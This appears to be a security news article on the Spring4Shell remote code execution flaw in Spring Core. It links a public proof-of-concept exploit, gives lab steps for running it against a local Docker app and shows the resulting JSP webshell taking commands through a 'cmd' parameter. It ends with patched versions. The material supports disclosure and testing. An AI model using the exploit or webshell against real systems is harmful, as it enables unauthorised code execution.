A new zero-day vulnerability in the Spring Core Java framework called ‘Spring4Shell’ has been publicly disclosed, allowing unauthenticated remote code execution on applications.

Spring is a very popular application framework that allows software developers to quickly and easily develop Java applications with enterprise-level features. These applications can then be deployed on servers, such as Apache Tomcat, as stand-alone packages with all the required dependencies.

Today, an exploit for this zero-day vulnerability was briefly leaked and then removed but not before cybersecurity researchers could download the code.

Since then, numerous cybersecurity researchers and security firms have confirmed that the vulnerability is valid and of significant concern.

Can confirm! The #Spring4Shell exploit in the wild appears to work against the stock "Handling Form Submission" sample code from https://t.co/dt05rTPbGQ
If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE... https://t.co/PFXoIusFcT pic.twitter.com/2gydOJk10Y

— Will Dormann (@wdormann) March 31, 2022

Proof of Concept

This is a dockerized application that is vulnerable to the Spring4Shell vulnerability. Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. There is nothing special about this application, it’s a simple hello world that’s based off Spring tutorials.

Exploit: https://github.com/reznok/Spring4Shell-POC/blob/master/exploit.py

Vulnerability Details: https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/

Requirements

1. Docker + Docker-Compose
2. Python3 + requests library

Instructions

1. Clone the repository
2. Run the container: docker-compose up –build
3. App should now be available at http://localhost:8080/helloworld/greeting

4. Install requests library in python

pip3 install requests

5. Run the exploit.py script: `

python3 exploit.py -url "http://localhost:8080/helloworld/greeting" -f shell

[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id

6. Visit the created webshell! Modify the cmd GET parameter for your commands. (http://localhost:8080/shell.jsp by default)

Remediation

Spring Framework versions 5.3.18 and 5.2.20, which address the vulnerability, are now available. The release process for Spring Boot is in progress.

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement